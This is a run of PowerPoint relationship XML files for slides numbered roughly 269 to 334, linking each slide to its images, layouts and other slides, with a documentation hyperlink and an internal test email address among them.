<file path=ppt/slides/_rels/slide269.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image313.png"/></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 Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide30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270.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71.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317.png"/><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16.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide272.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image319.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image318.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide273.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide274.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image322.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide275.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76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image323.png"/><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26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image325.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image324.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide277.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image327.png"/><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30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image329.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image328.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image334.png"/><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26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image333.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide279.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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slide" Target="slide429.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80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.gif"/><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39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image338.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide281.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slide" Target="slide253.xml"/><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282.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83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342.png"/><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45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image344.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image343.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide284.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image346.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><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49.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image348.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide285.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slide" Target="slide253.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide286.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.gif"/><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56.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image355.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide288.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image359.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><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289.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290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.png"/><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63.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image362.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image361.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide291.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.bmp"/><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68.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image367.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide292.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slide" Target="slide253.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide293.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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94.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373.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image372.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide295.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96.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376.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image375.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image377.png"/><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80.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image379.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide298.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slide" Target="slide253.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image382.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide299.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385.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/></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 Target="slide2.xml"/><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slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30.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slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide300.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.bmp"/><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388.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image387.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide301.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slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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03.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.bmp"/><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391.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide304.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><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95.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide305.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06.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.bmp"/><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99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image398.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image401.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide308.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slide" Target="slide253.xml"/><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309.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slide" Target="slide253.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image404.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><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10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408.bmp"/><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407.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide312.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13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image414.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.bmp"/><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412.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image411.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide314.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image415.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.bmp"/><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418.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image417.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image416.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide315.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image425.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.png"/><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423.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image422.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide317.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image426.png"/><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428.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image427.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide318.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19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image432.bmp"/><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431.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image430.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image429.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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hyperlink" Target="https://docs.microsoft.com/ko-KR/windows/wsl/wsl2-kernel" TargetMode="Externa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slide" Target="slide429.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide320.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.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21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image433.png"/><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435.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image434.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide322.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide356.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide346.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide323.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide340.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide335.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide371.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide328.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide363.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide323.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image436.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/><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324.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide325.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image441.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image437.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image440.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39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image438.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide326.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image447.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image446.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45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image444.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image443.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide327.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image448.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide328.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide329.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453.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52.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image451.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.pn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slide" Target="slide25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide330.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56.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide331.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460.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59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide332.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464.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63.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide333.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67.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide334.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image469.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/></Relationships>
</file>

